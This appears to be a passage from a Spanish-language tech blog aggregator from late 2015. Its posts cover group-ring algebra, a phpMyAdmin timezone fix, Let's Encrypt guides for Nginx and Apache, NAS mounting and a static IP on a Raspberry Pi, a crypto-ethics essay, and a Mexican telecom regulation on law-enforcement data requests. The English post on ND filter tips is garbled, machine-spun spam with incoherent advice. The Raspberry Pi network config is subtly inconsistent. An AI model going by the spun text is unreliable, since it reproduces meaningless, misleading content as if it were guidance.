$latex \sum k_\alpha \alpha \in V$ donde $latex \alpha \in A$ y $latex k_\alpha \in \mathbb K$

La adición está definida de manera natural como

$latex (\sum k_\alpha\cdot\alpha)+(\sum c_\alpha \cdot \alpha)=\sum (k_\alpha+c_\alpha)\cdot \alpha$

También tenemos la multiplicación por un escalar, por ejemplo si tomamos un $latex a\in \mathbb K$

$latex a(\sum k_\alpha \alpha)= \sum (a k_\alpha)\cdot \alpha$

Es decir, es la usual la suma coordenada a coordenada en el espacio vectorial $latex V$, y la multiplicación por escalar, pero nosotros somos más ambiciosos y queremos darle una estructura de álgebra para poder multiplicar los vectores,

Tenemos que observar que $latex A\subset V$ ya que si nos tomamos un $latex \gamma \in A$ tenemos que:

$latex V\ni \gamma^{*} = \sum k_\alpha \alpha$ donde $latex k_\gamma = 1$ y $latex k_\alpha = 0$ $latex \forall \alpha \neq \gamma$ por lo que $latex A$ es base de $latex V$ .

La multiplicación primera que se viene a la mente es una que es muy mediocre (al menos a mi se me ocurrió así) que es como la suma.. coordenada a coordenada pero eso no le da nada de estructura, pero bueno, ¿por qué no se puede ocurrir otra? , pues porque el conjunto $latex A$ no tiene nada de estructura..., no hay por donde podamos jugar.

Pero qué sucedería si le metemos estructura a $latex A$ y le pedimos que sea un grupo.


Anillo de grupo asociado a un campo $latex \mathbb K$ y un grupo $latex G$ 

Este lo denotaremos por $latex \mathbb{K}[G]$ y la suma está definida de la misma manera que con $latex A$ , pero lo que nos importa ahora es la es la multiplicación y explotando la operación en $latex G$ podemos definir lo siguiente:

Sean $latex \alpha.\beta \in G$ y $latex k_\alpha,k_\beta \in \mathbb K$ entonces definimos la multiplicación $latex \odot$ en $latex \mathbb{K}[G]$ como:


$latex (\sum_{\alpha \in G} k_\alpha\cdot\alpha)\odot (\sum_{\beta \in G} k_\beta \cdot \beta)=\sum_{\alpha,\beta \in G} (k_\alpha k_\beta)\cdot \alpha\beta =\sum_{\gamma\in G} k_\gamma \cdot \gamma$

Aquí tenemos que $latex \gamma = \alpha\beta\in G$ por lo que $latex \alpha=\gamma\beta^{-1}$

entonces para poder definir la multiplicación de manera directa.


tenemos que:

$latex k_\gamma$ es la suma de todos los productos $latex k_\alpha k_\beta$ tal que $latex \gamma=\alpha \beta$.

por lo que el coeficiente que le toca a $latex \gamma$ que es $latex k_\gamma$ está dado por:

$latex k_\gamma=\sum_{\alpha\beta=\gamma} k_\alpha k_\beta=\sum_{\alpha \in G} k_\alpha k_{\alpha^{-1}\gamma}$

La pregunta es, si suponemos que $latex \alpha,\beta \in\mathbb{K}[G]^{*}$ podría suceder que $latex \alpha\odot\beta=0$ , para cualquier campo $latex \mathbb{K}$ cuando $latex G$ es un grupo libre de torsión... no se sabe... hay algunos avances para ciertos $latex G$ y cuando $latex \mathbb{K}=\mathbb{C}$ , yo en particular estoy tratando de demostrar esto para un un grupo infinito de automorfismos de una variedad con su campo de funciones es decir algo así como $latex \mathcal{K}(V)[Aut_\mathcal{K}(V)]$.

Espero les haya gustado.

Eduardo Ruiz Duarte
twitter: @toorandom

Miércoles 16 de diciembre de 2015

José Mendoza Roa

José Mendoza Roa
Tucancunix Blog

Unbelievable ND Filter Usage Tips Disclosed

If you grab signals you shift on your own as an example torches LED lights fibers optic equipment and lighting and sparklers that is definitely termed lightweight piece of art and could be used to build wonderful visuals of light-weight trails along with the illuminated setting and resolved physical objects.Also they should not be graphical and beauty so one ought to use the queues shadows and lighting fixtures.You’re taking a night time capture with the college honest.Allow us to talk about some important sorts at length and the use of nd filter can make a difference.

DSLR video cameras at your fingertips plus some items of taking photos tools you may take spectacular photography lovers as spring bursts into blossom.People around the globe make use of user friendly gadgets for hitting the most effective photographs of their own living.It presents more dark richer and fuller shades when minimizing glare in anything you are considering although as well enhancing all-natural coloration while you are working in sunny ailments.Internal images take time and effort to use within the older buildings because there are little doors and windows which basically absence sun light.While catching the primary photos is not any perspiration with just the snap equipment toolkit getting a handful of essential equipment might make all the difference in arresting the high high quality photographs and protecting the important expense.You’ll need a lot of persistence to make this happen and some understanding of the species but it will pay away ultimately.

Ferris wheel seems as a rounded streak of stunning hues.Without having a fantastic focus your shots will turn out seeking empty leaving behind the eye with not anywhere to rest.However remaining Cycles through.Skies and liquid looks deeper and more dark and plants and plants will be white-colored or light blue white-colored with your infrared shots.It could be a grayish or even a colorless unit.When using shots in the evening time utilizing a display normally contributes to some loss of color and a few of the attractive element from the golf shot that can make for a rinsed out uninteresting looking photograph.

Architecture taking photos will not be restricted together with the top from the setting up.Other methods that can be done without the need for.Finepix selection link marked using an.ND filter the unit helps with reducing or altering the power of all shades or wavelengths of gentle likewise while not presenting any adjustments to the attributes of shade rendition.Furthermore they must not be artwork and inventive and that means you have to do along with the collections silhouettes and glows.

This electric digital camera boasts a profound shaped fretting hand hold so that it is at ease to hold securely.Difficult scenarios or skinny sleeves offer a space saving and expense efficient way to maintain level and click digital cameras in contrast to significant situations permit top end cameras owners to retail outlet a variety of gadgets as well as the high-end camera.

Mario Oyorzábal

Mario Oyorzábal
blog – TuXsOuL

hola mundo, el regreso de mi …

Como siempre que escribimos, el inicio es lo complicado, ya hace tiempo que tenía abandonado este pequeño espacio en la red, esto dado por muchas cosas que nos absorben.

Actualmente acabo de salir de un trabajo, ya que fue mi primera vez trabajando en una empresa, como toda experiencia tiene sus pros y sus contras, pero la verdad fue muy gratificante, aprendí cosas nuevas y también conocí a mas personas, dado que no soy muy social, aunque creo que nadie me cree, pero fue un gran paso.

Como todo, mi ciclo termino en la empresa y es hora de seguir adelante buscando otro trabajo, pero ademas quiero comenzar con muchas cosas que traigo en la cabeza, proyectos, desarrollos, etc., etc.

Y también el seguir escribiendo en el blog, que por el momento parece en blanco, pero poco a poco lo volveré a llenar con todas las cosas que me gustan.

Felices Fiestas :)

La entrada hola mundo, el regreso de mi … aparece primero en TuXsOuL.
Regálele un café al autor a través de bitcoin: 16pVAeNnMKRhfsNd9AGw8ioqWxCaRAfiGS.

Sábado 12 de diciembre de 2015

José Oviedo

José Oviedo
oviedo.mx

Error 500 con Nginx+Chroot+PHP5-FPM+PhpMyadmin

Despues de hacer la instalación de Nginx y PHP5-FPM con Chroot (Jail) e instalar MySQL PhpMyAdmin la página me daba un error 500.

Investigando veo que el problema esta en la siguiente línea del archivo library/common.inc.php de PhpMyAdmin.

date_default_timezone_set(@date_default_timezone_get());

El problema está en que la función date_default_timezone_get() y todo se debe a que no se tienen los archivos necesarios para buscar la timezone del servidor, como lo muestra el log de nginx

[error] 12058#0: *13 FastCGI sent in stderr: “PHP message: PHP Fatal error: date_default_timezone_get(): Timezone database is corrupt – this should *never* happen! in /var/www/phpmyadmin/libraries/common.inc.php on line 276” while reading response header from upstream, client: 111.111.111.111, server: miservidor.com, request: “GET /phpmyadmin/ HTTP/1.1”, upstream: “fastcgi://127.0.0.1:9000”, host: “miservidor.com”

La solución es instalar la timezonedb con PHP-PEAR ( pecl ), procedemos con el siguiente código:

apt-get install php-pear php5-dev
pecl install timezonedb
echo ‘extension=timezonedb.so’> /etc/php5/mods-available/timezonedb.ini
ln -sf /etc/php5/mods-available/timezonedb.ini /etc/php5/fpm/conf.d/30-timezonedb.ini
service php5-fpm restart

Y listo!!.. ya debe de funcionar correctamente la página de PhpMyAdmin

HowTo: Generate free SSL certificates for NginX/Tengine with LetsEncrypt

OK, it’s fairly easy to get this done on a distro like Funtoo/Gentoo or Fedora, which are the distros I use.

First of all, you need to install this thing on your server:

# Fedora
su -
dnf -y install letsencrypt

# Funtoo/Gentoo
su -
mkdir src && cd src
git clone https://github.com/letsencrypt/letsencrypt
cd letsencrypt
./letsencrypt-auto --help

This will install, in both cases, the necessary stuff to generate your certificates. Now, on the second case, it’s going to create a virtual environment. The letsencrypt package is available for Funtoo/Gentoo but masked for now.

OK, now, we’re going to use the manual method to generate our certificates. This is because they say that nginx is highly experimental at the moment and we don’t want to mess around with these things so we’re to do it manually and learn a bit in the process.

Now, after you install, you’re gonna have /etc/letsencrypt created. Backup that directory right now!

tar -caf $( date +%Y%m%d )-etc-letsencrypt.tar.gz /etc/letsencrypt

Now, let’s generate some certs. No wildcards so we’re to generate as many specific domain certs as we want, in a single run!

letsencrypt certonly --manual --agree-tos -m renich@woralelandia.com -d woralelandia.com -d www.woralelandia.com -d downloads.woralelandia.com -d blog.woralelandia.com

This will generate all my certs. It will ask me if I agree of my server’s IP being logged. I do agree. So, I say yes. After that, it will ask me something like: “make sure this file is visible in http://woraleladnia.com/.well-known/acme-challenge/ and it contains “. So, just make sure you can click on the link and see the contents. This is to be done manually. For example:

umask 022
cd /srv/www/woralelandia.com/default/public
mkdir -p .well-known/acme-challenge
cd .well-known/acme-challenge
touch allaskdjlk2j3l4kj3245lw2kj4lkj4l2k3j4lk23j4lkj234 # the long filename mentioned before
echo 'allaskdjlk2j3l4kj3245lw2kj4lkj4l2k3j4lk23j4lkj234.2Z_2342847298slkdjflksdjflkjr95832ulsdjf' > allaskdjlk2j3l4kj3245lw2kj4lkj4l2k3j4lk23j4lkj234

Obviously, try the link and see if the contents are correct.

Now, you will have to do this for all domains. In my case: woralelandia.com, www.woralelandia.com, blog.woralelandia.com and downloads.woralelandia.com.

After this, it tells you a bunch of things but it says the word: “congratulations” somewhere. If you see that word, you’re there, dude/dudess!

This thing has created some certs in a very non-FHS place: /etc/letsencrypt/live/woralelandia.com in my case. So now, the contents of that are some symlinks:

cert.pem  chain.pem  fullchain.pem  privkey.pem

This is smart by them. You will need to update these in 3 months! You should be able to automate this in a cron job or something. I’ll try to do that later on.

Now, I am to use the cert and the privkey. I will edit my nginx configuration and add:

ssl_certificate /etc/letsencrypt/live/woralelandia.com/cert.pem;
ssl_certificate_key /etc/letsencrypt/live/woralelandia.com/privkey.pem;

To all the server {} instances I need to. Also, try having:

ssl_protocols TLSv1.2;
ssl_ciphers HIGH:!aNULL:!MD5;

somewhere in your global conf; somewhere inside http {}. This will limit the protocols to use and leave you with the one you’re using. If you don’t know what this is, just leave it as it is. This is semi-pro stuff 😉

References
* https://letsencrypt.org/2015/12/03/entering-public-beta.html
* https://github.com/letsencrypt/letsencrypt
* http://nginx.org/en/docs/http/configuring_https_servers.html

Jueves 10 de diciembre de 2015

Gerónimo Orozco

Gerónimo Orozco
Patux's booring news

Software Defined Storage - What makes Ceph special

Registrate




Ceph is an open source distributed object store, network block device, and file system designed for reliability, performance, and scalability. It runs on commodity hardware, has no single point of failure, and is supported in the Linux kernel.

This talk is a follow up of a previous talk for OpenStackGDL "Introduction to Ceph and architectural overview" by Federico Lucifredi. Look for the previous slides on: http://openstackgdl.org/

Federico Lucifredi is the Ceph Product Management Director at Red Hat, and was previously the Ubuntu Server PM at Canonical, and the Linux "Systems Management Czar" at SUSE.

Lunes 07 de diciembre de 2015

Óscar A. Parra V.

Óscar A. Parra V.
El Canibal » Geek

Montando unas carpetas del NAS

En el NAS tengo configurado unas carpetas con ciertos derechos de escritura y lectura, pero tengo publicas donde tengo las series y peliculas

ahora, quiero montralas en mi pi y quiero que este cada vez que reinicie la pi

Primero voy a hacer una folder en mi pi

sudo mkdir -p /media/compartido/series

lo hacemos de la misma manera para los otros folders que queramos

Ahora voy a editar el siguiente archivo fstab:

sudo nano /etc/fstab

vamos a añadir la siguiente linea:

//192.168.1.10/series /media/compartido/series cifs guest,uid=1000,gid=1000,iocharset=utf8 0 0

La primera parte es la ubicacion del drive compartido y el folder que quieres montar
La segunda parte es el folder donde lo quieres montar.
La tercera parte le indicas como lo quieres montar (cifs)
El guest le estas diciendo que no necesitas user ni password para poder entrar.
El uid y gid en 1000 hace que el usuario pi pueda hacer cambios.

 

Sábado 05 de diciembre de 2015

Gunnar Wolf

Gunnar Wolf
Gunnar Wolf

Scientific research and a moral stand should go hand in hand

During the last few days, I found several references to a beautiful just-published paper, which I hope everybody reads: The Moral Character of Cryptographic Work, by Phillip Rogaway; Cryptology ePrint Report 2015/1162, published on December 1st this year. It is more an academic essay than most crypto-related papers, and a long one at that (46 pages, packed with references and anecdotal notes).

But it is surprisingly easy to read. I am sitting in front of my computer while my students work on their final exam, and I have got over half way through the text; earlier today I looked at the quick presentation (as this work was presented by Rogaway at the Asiacrypt 2015 as an invited talk), and just loved it.

Now, I know most of the people reading my blog have a moral stand on their work (after all, I expect most of you to be committed to Free Software just as I am, and that is a tremendous political statement). We are also more a practice community than an academic/scientific one. But many of us dwell on several projects and hold more than one hats in life through which we are defined.

This paper/essay is really clicking with me, and it deeply resonates with the justification I presented when I joined the Masters on Security Engineering and Information Technologies program which I'm halfway through. Computer security does not exist in a void, and does not exist just for itself. As professionals, we have a mission to fulfill in society, and that will then shape how society evolves.

So, I invite everybody to at least take a casual look at this paper. I hope you enjoy it as much as I did, and I hope it changes people's hearts and career decisions.

Viernes 04 de diciembre de 2015

Marco Alfonso Ocampo

Marco Alfonso Ocampo
Pub – Marco Alfonso

Instalar y Configurar Let’s Encrypt

Hola mundo,

Finalmente y después de tanta espera, Let’s Encrypt ha entrado en fase de Public Beta, es decir ya cualquiera que desee probarlo puede entrar y generar sus certificados.

Para quienes no conozcan que es Let’s Encrypt, es una nueva Autoridad de Certificación, abierta y gratis. Es administrado por la Internet Security Research Group (ISRG), y es patrocinado por las mas importantes Fundaciones de Internet, tales como la EFF, Mozilla, y también por grandes empresas como Cisco, Facebook, Ident Trust, Internet Society, entre otros.

La idea de Let’s Encrypt es que cualquiera tiene derecho de poder ofrecer seguridad a través de la encriptación (HTTPS) en sus sitios web, antes de la llegada de Let’s Encrypt, uno tenía que pagar a una Autoridad de certificación tales como Symantec, GoDaddy, DigiCert, Verizon, etc… cierta cantidad desde unos cientos y hasta los miles de USD dependiendo el nivel de certificación deseada.

Pero para la mayoría de usuarios un certificado de validación de nombre de dominio es mas que suficiente y esto es lo que ofrece Let’s Encrypt, que tus usuarios tengan plena seguridad de que los datos que viajan desde su máquina a tu servidor/sitio no puede ser leída por nadie mas, pues el certificado sólo puede provenir del servidor donde reside el dominio auténtico y no de un suplantador (ó de una agencia de espionaje cofcofNSAcofcof)

 

Instalación

Primero que nada, todo lo siguiente debes correrlo en el servidor en donde residen los dominios para los que quieres generar los certificados, pues Let’s Encrypt debe poder escribir ciertos archivos en su WebRoot (a.k.a. DocumentRoot) para poder validar efectivamente que eres el dueño del dominio y tienes control sobre él.

Paso 1, Debes tener Git instalado y clonar el depósito:

user@webserver:~$ git clone https://github.com/letsencrypt/letsencrypt.git

Paso 2, Córrelo una vez para que pueda instalar todas sus dependencias (la mayoría bibliotecas en python), por tanto debes tener privilegios de administrador ya sea acceso a root directo o por medio de sudo, posteriormente generará una nueva llave privada y con el email que le especifiques creará una nueva cuenta para ti en los servidores de Let’s Encrypt, todo esto es un proceso automático. NOTA: De momento no le especifiques ningún dominio.


root@webserver:~$ cd letsencrypt
root@webserver:~/letsencrypt$ ./letsencrypt-auto --email tudireccion@deemail.com --agree-tos

Paso 3, Let’s Encrypt tiene plugins para poder leer archivos de configuración de Apache, saber que dominios tienes, donde están y modificar estas configuraciones para añadir los certificados de manera automágica, pero esto es un grave problema para los que tenemos servidores web con algún tipo de panel de control que genera sus propias configuraciones y sobreescribirían los cambios hechos por Let’s Encrypt, otra opción es que dejes a Let’s encrypt levantar un web server standlone, pero esto implica que debes detener tu web server principal.

En mi caso estos 2 primeros métodos no son una opción, así que me fuí por la tercera, puedes darle a Let’s Encrypt el path al DocumentRoot de tu dominio para que realice la validación con unos archivos especiales que debe guardar allí. Aclarado esto, digamos que tienes tus dominios en /var/www/$dominio, por ejemplo /var/www/fulanito.com, correríamos lo siguiente:


root@webserver:~/letsencrypt$ ./letsencrypt-auto certonly --webroot -w /var/www/fulanito.com/ -d fulanito.com

¡Y listo!, generará automáticamente tu CSR (Certificate Signing Request), lo firmará, lo enviará a los servidores de Let’s Encrypt, estos validará que existan los archivos en fulanito.com/.well-known/acme-challenge/ y de ser así devolverá el certificado firmado. Se generarán 4 archivos en /etc/letsencrypt/live/fulanito.com/


root@webserver:~# ls /etc/letsencrypt/live/fulanito.com/
cert.pem  chain.pem  fullchain.pem  privkey.pem

Los cuales contienen:

  • cert.pem – contiene el certificado firmado
  • chain.pem – certificado “intermedio”
  • fullchain.pem – contiene ambos cert.pem y chain.pem, para los servicios que soporten este formato
  • privkey.pem – la llave privada del certificado

Configurar el webserver (Apache y NginX)

Esto sería lo único a añadir en tu virtualhost de Apache, (si antes no usabas SSL, asegúrate de activar los módulos y habilitar el virtualhost de SSL que contiene las entradas para el puerto 443)


<VirtualHost ww.xx.yy.zz:443>
        ...
        SSLEngine on
        SSLCertificateFile /etc/letsencrypt/live/fulanito.com/cert.pem
        SSLCertificateKeyFile /etc/letsencrypt/live/fulanito.com/privkey.pem
        SSLCertificateChainFile /etc/letsencrypt/live/fulanito.com/chain.pem
        ...
</VirtualHost>

Y para NginX, algo como lo siguiente:


server {
    listen      ww.xx.yy.zz:443;
    server_name fulanito.com www.fulanito.com;
    ssl         on;
    ssl_certificate      /etc/letsencrypt/live/fulanito.com/fullchain.pem;
    ssl_certificate_key  /etc/letsencrypt/live/fulanito.com/privkey.pem;
    ...

Y eso es todo, espero este artículo les sirva en algo y les ayude a brindar mas seguridad a sus sitios web. Como ven es bastante fácil utilizar Let’s Encrypt.

Sólo resta mencionar que quienes tienen su hosting/cloud server/dedicado con ideaslabs.com pueden solicitar su certificado gratis y se les será configurado casi al instante sin costo alguno ;)

Saludos!

Jueves 03 de diciembre de 2015

Óscar A. Parra V.

Óscar A. Parra V.
El Canibal » Geek

Cambiandole la IP a la Pi a staic

Lo primero que debes tener son estos datos:

  • Direccion IP
  • Netmask
  • Gateway
  • DNS
  • Wireless SSID
  • Wireless Password

Editaremos la informacion interfaces

sudo nano /etc/network/interfaces

Y querremos que quede de esta manera:

auto lo
iface lo inet loopback
iface eth0 inet manual

address 192.168.1.222
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1

Despues, necesitamos resetear el Pi o bien, solo el servicio.

El servicio se resetea de esta forma:

sudo service networking restart

O reseteamos la Pi

sudo reboot

 

Miércoles 02 de diciembre de 2015

Rigoberto Calleja

Rigoberto Calleja
Apuntes de Rigoberto Calleja

IFT – Lineamientos de colaboración en materia de seguridad y justicia

ACUERDO MEDIANTE EL CUAL EL PLENO DEL INSTITUTO FEDERAL DE TELECOMUNICACIONES EXPIDE LOS LINEAMIENTOS DE COLABORACIÓN EN MATERIA DE SEGURIDAD Y JUSTICIA Y MODIFICA EL PLAN TÉCNICO FUNDAMENTAL DE NUMERACIÓN, PUBLICADO EN EL DIARIO OFICIAL DE LA FEDERACIÓN EL 21 DE JUNIO DE 1996.

ANTECEDENTES

I.- El 11 de junio de 2013, se creó el Instituto Federal de Telecomunicaciones (en lo sucesivo, el “Instituto”) como un órgano autónomo con personalidad jurídica y patrimonio propio, para regular, promover y supervisar el uso, aprovechamiento y explotación de los servicios de radiodifusión y telecomunicaciones, además de ser la autoridad en materia de competencia económica en los sectores de los servicios antes aludidos, conforme a lo dispuesto en el “Decreto por el que se reforman y adicionan diversas disposiciones de los artículos 6o., 7o., 27, 28, 73, 78, 94 y 105 de la Constitución Política de los Estados Unidos Mexicanos, en materia de telecomunicaciones”.

II.- El 14 de julio de 2014, se publicó en el Diario Oficial de la Federación (en lo sucesivo, el “DOF”), el “Decreto por el que se expiden la Ley Federal de Telecomunicaciones y Radiodifusión, y la Ley del Sistema Público de Radiodifusión del Estado Mexicano; y se reforman, adicionan y derogan diversas disposiciones en materia de telecomunicaciones y radiodifusión”, ordenamientos que entraron en vigor treinta días naturales siguientes a su publicación, es decir, el 13 de agosto de 2014.

III.- El 11 de noviembre de 2014, mediante Acuerdo P/IFT/EXT/111114/215, el Pleno del Instituto en sesión extraordinaria aprobó someter a consulta pública el “Anteproyecto de Lineamientos de Colaboración en Materia de Seguridad y Justicia” (en lo sucesivo, el “Anteproyecto de Lineamientos”). Dicha consulta pública se llevó a cabo del 12 al 27 de noviembre de 2014.

Derivado de lo anterior y,

CONSIDERANDO

Primero.- De conformidad con lo establecido en los artículos 28, párrafo vigésimo, fracción IV de la Constitución Política de los Estados Unidos Mexicanos (en lo sucesivo, la “Constitución”), así como en los diversos 1, 2, 3, 7, 15 fracción I, 124, 189 y 190 de la Ley Federal de Telecomunicaciones y Radiodifusión (en lo sucesivo, la “LFTR”) y 1° del Estatuto Orgánico del Instituto Federal de Telecomunicaciones (en lo sucesivo, el “Estatuto”); el Instituto en su carácter de órgano autónomo, está facultado para promover el desarrollo eficiente y la prestación de los servicios públicos de radiodifusión y telecomunicaciones mediante la regulación, promoción y supervisión del uso, aprovechamiento y explotación del espectro radioeléctrico y de las redes públicas de telecomunicaciones y el acceso a la infraestructura activa, pasiva y otros insumos esenciales, a fin de garantizar lo establecido en los artículos 6o. y 7o. de la Constitución, además de ser la autoridad en materia de competencia económica en los sectores de los servicios antes aludidos.

Asimismo, el Instituto a través de su Órgano de Gobierno, resulta competente para emitir disposiciones administrativas de carácter general, planes técnicos fundamentales, lineamientos, modelos de costos, procedimientos de evaluación de la conformidad, procedimientos de homologación y certificación y ordenamientos técnicos en materia de telecomunicaciones y radiodifusión; así como demás disposiciones para el cumplimiento de su función regulatoria en los sectores de su competencia. En tales circunstancias, está facultado para emitir el presente Acuerdo mediante el cual se emiten los Lineamientos de Colaboración en Materia de Seguridad y Justicia y se modifica el Plan Técnico Fundamental de Numeración.

Segundo.- Es obligación del Estado Mexicano garantizar la seguridad pública, la seguridad nacional, así como una efectiva procuración de justicia, por lo que en la LFTR se incluyó el Título Octavo “De la Colaboración con la Justicia”, que establece la obligación de los Concesionarios de telecomunicaciones y Autorizados de atender todo mandamiento por escrito, fundado y motivado de la autoridad competente en los términos que establezcan las leyes.

En este tenor, el artículo transitorio VIGÉSIMO SEGUNDO de la LFTR mandata que el Instituto deberá emitir las disposiciones administrativas de carácter general a que se refiere el Título Octavo de la LFTR.

Asimismo, se establece que los titulares de las instancias de seguridad y procuración de justicia designarán a los servidores públicos encargados de gestionar los requerimientos que se realicen a los Concesionarios y Autorizados para recibir la información correspondiente, mediante acuerdos publicados en el DOF.

Además, conforme al párrafo tercero del artículo 190, fracción I, de la LFTR, le corresponde al Instituto, escuchando a las instancias de seguridad y procuración de justicia, establecer los lineamientos que los Concesionarios de telecomunicaciones y Autorizados deben adoptar para que la colaboración con dichas autoridades, sea efectiva y oportuna.

En ese sentido, los lineamientos que se emiten contienen las disposiciones técnicas y administrativas necesarias para proveer la observancia de las mencionadas obligaciones, sujetándose al marco legal.

Tercero.- Con fundamento en el artículo 190, fracción I, párrafo tercero, y fracción II, párrafo tercero de la LFTR, el Instituto coordinó y llevó a cabo, de manera posterior a la consulta pública, más de 20 reuniones de trabajo con diversas autoridades de seguridad y procuración de justicia, con el objeto de escuchar sus necesidades, propuestas y mecanismos relativos a la colaboración con la justicia a que se refiere el Título Octavo de la LFTR, entre otras, la Procuraduría General de la Republica, Policía Federal y Coordinación Nacional Antisecuestro, las cuales informaron sobre los mecanismos particulares para llevar a cabo la gestión de requerimientos de información de localización geográfica en tiempo real y registro de datos conservados. Derivado de lo anterior, el Instituto se dio a la tarea de evaluar mecanismos que permitieran una colaboración efectiva y oportuna tanto a partir de la entrada en vigor de los presentes lineamientos (por ejemplo, el correo electrónico Cifrado) como en un mediano plazo (Plataforma Electrónica con sellos o firmas digitales).

Cabe resaltar que durante la XXXIII Asamblea Plenaria de la Conferencia Nacional de Procuración de Justicia celebrada en el mes de agosto de 2015, en la Ciudad de México, se acordó la aprobación de los “Lineamientos de Colaboración en Materia de Seguridad y Justicia”, entre los Procuradores y Fiscales del país con el Instituto, a fin de gestionar y realizar el intercambio de información derivada de los requerimientos de información de localización geográfica y entrega de datos conservados con los Concesionarios, y en su caso, Autorizados.

Como resultado de la intensa interacción con autoridades y con fundamento en el artículo 190, fracción II, párrafo tercero de la LFTR, el Instituto fue informado e incorporó a los lineamientos de mérito, los mecanismos de solicitud y entrega, los cuales incluyen entre otros:

  • Entrega de información por medios físicos o electrónicos.
  • Uso inicial de correo electrónico Cifrado para gestionar y recibir los requerimientos de información.
  • Migración a Plataformas Electrónicas que cuente con herramientas digitales para certificar la autenticidad e integridad de los requerimientos.
  • La información proporcionada por los Concesionarios y, en su caso, Autorizados, como resultado de los requerimientos de información deberán entregarse en formato editable, tales como “.csv” o .”xls”.
  • Las precisiones de localización geográfica de las redes de los Concesionarios deben cumplir con normatividad y buenas prácticas internacionales.

El Instituto, considerando la complejidad de los diversos temas que componen el Título Octavo de la LFTR, realizó un análisis exhaustivo de toda la documentación y propuestas recibidas, así como de los comentarios, opiniones y posicionamientos vertidos durante las reuniones de trabajo con los diversos actores previamente señaladas.

El resultado del análisis exhaustivo realizado se refleja en los considerandos del presente Acuerdo, en los Lineamientos y en las modificaciones que se proponen al Plan Técnico Fundamental de Numeración.

Cuarto.- El artículo 51 de la LFTR establece que para la emisión y modificación de reglas, lineamientos o disposiciones administrativas de carácter general, el Instituto deberá realizar consultas públicas bajo los principios de transparencia y participación ciudadana.

Asimismo, señala que el Instituto contará con un espacio dentro de su portal de Internet destinado específicamente a publicar y mantener actualizados los procesos de consultas públicas, así como que las respuestas o propuestas que se realicen al Instituto no tendrán carácter vinculante, sin perjuicio de que el Instituto pondere las mismas en un documento que refleje los resultados de dicha consulta.

En este sentido, tal como quedó establecido en los Antecedentes del presente Acuerdo, el Anteproyecto de Lineamientos fue objeto de consulta pública por un plazo de diez días hábiles.

Durante la consulta pública del Anteproyecto de Lineamientos de Colaboración en Materia de Seguridad y Justicia comprendida del 12 al 27 de noviembre de 2014, se recibieron 28 participaciones: 19 de personas morales y 9 de personas físicas. Al respecto, se contó con la participación de los sujetos regulados, cámaras y asociaciones del sector de telecomunicaciones, entre otras, la Asociación Nacional de Telecomunicaciones (ANATEL), la Asociación Mexicana de Internet (AMIPCI), la Cámara Nacional de la Industria Electrónica, de Telecomunicaciones y Tecnologías de la Información (CANIETI) y la Comisión de Telecomunicaciones del Consejo Coordinador Empresarial (CCE), así como de personas físicas; al efecto se recibieron comentarios, opiniones y propuestas concretas al Anteproyecto de Lineamientos, de las cuales el Instituto identificó diversas posturas respecto al proceso e implementación de los mecanismos y medios para la gestión de requerimientos de información de localización geográfica en tiempo real y de datos conservados.

Al efecto, se publicaron en el portal de Internet del Instituto todos y cada uno de los comentarios, opiniones y propuestas recibidas sobre el Anteproyecto de Lineamientos.

Aunado a lo anterior, el Instituto en un ejercicio de transparencia y participación, en adición al periodo de consulta pública, recibió y llevó a cabo reuniones con organizaciones sociales de derechos humanos y de víctimas de la delincuencia. Al respecto, las primeras manifestaron su interés en la salvaguarda siempre y en todo momento de la protección de la privacidad y los Datos Personales de los usuarios a que se refieren en los Lineamientos de mérito; mientras que las segundas expresaron su interés en que los mecanismos y medios que se establecieran en los Lineamientos permitieran una efectiva y oportuna colaboración de los Concesionarios y, en su caso, Autorizados, con las autoridades, sobre todo, cuando se encuentre en peligro la vida humana.

De las manifestaciones y propuestas recibidas, el Instituto identificó y valoró oportunidades de precisión y mejora del instrumento regulatorio de mérito, logrando clarificar y robustecer su contenido, considerando, entre otros: el establecimiento de mecanismos alternos de intercambio de información (físicos, correo electrónico, entre otros); la no consideración del uso del NIPSC (Número de Identificación Personal del Servicio Contratado) en los procesos de acreditación de la titularidad del Dispositivo o Equipo Terminal Móvil y/o los servicios contratados en cualquier modalidad, así como el establecimiento de Grupos de Trabajo a efecto de definir y adoptar medidas que permitan una colaboración más efectiva y oportuna en materia de seguridad y justicia, conformados por las Autoridades Facultadas, Autoridades Designadas, el Instituto y los Concesionarios y Autorizados. Dichos Grupos darán seguimiento, entre otros, a los siguientes temas:

I. Implementación y evolución tecnológica de las Plataformas Electrónicas previstas en el lineamiento OCTAVO y de los mecanismos para la entrega y recepción de los requerimientos de información sobre localización geográfica en tiempo real y entrega de datos conservados;

II. Evolución tecnológica e implementación de los parámetros de precisión y Rendimiento en materia de localización geográfica en tiempo real, y

III. Definición e implementación, en su caso, de nuevos requerimientos de información conforme a la evolución tecnológica de las telecomunicaciones.

Las respuestas y comentarios a las participaciones recibidas durante el periodo de consulta pública se encuentran disponibles en el portal de Internet del Instituto.

Quinto.- El auge de las telecomunicaciones ha potenciado la transformación de las tecnologías de la información y comunicación, siendo la telefonía móvil y el Internet los servicios de mayor penetración a nivel mundial, imprescindibles para todas las actividades de la sociedad.

Sin embargo, el beneficio alcanzado por la sociedad de la información ha traído consigo algunos efectos colaterales negativos, ya que en los últimos años el uso para actividades ilegales de los equipos de comunicación móvil y de los sistemas informáticos, se ha convertido en un fenómeno delincuencial que afecta a la gran mayoría de los países y sus habitantes.

1. De los requerimientos de información en materia de seguridad y justicia

Conforme al párrafo tercero de la fracción II del artículo 190 de la LFTR, la solicitud y entrega en tiempo real de los datos referidos en dicho apartado, “se realizará mediante los mecanismos que determinen las autoridades a que se refiere el artículo 189 de esta Ley, los cuales deberán informarse al Instituto para los efectos de lo dispuesto en el párrafo tercero, fracción I del presente artículo“.

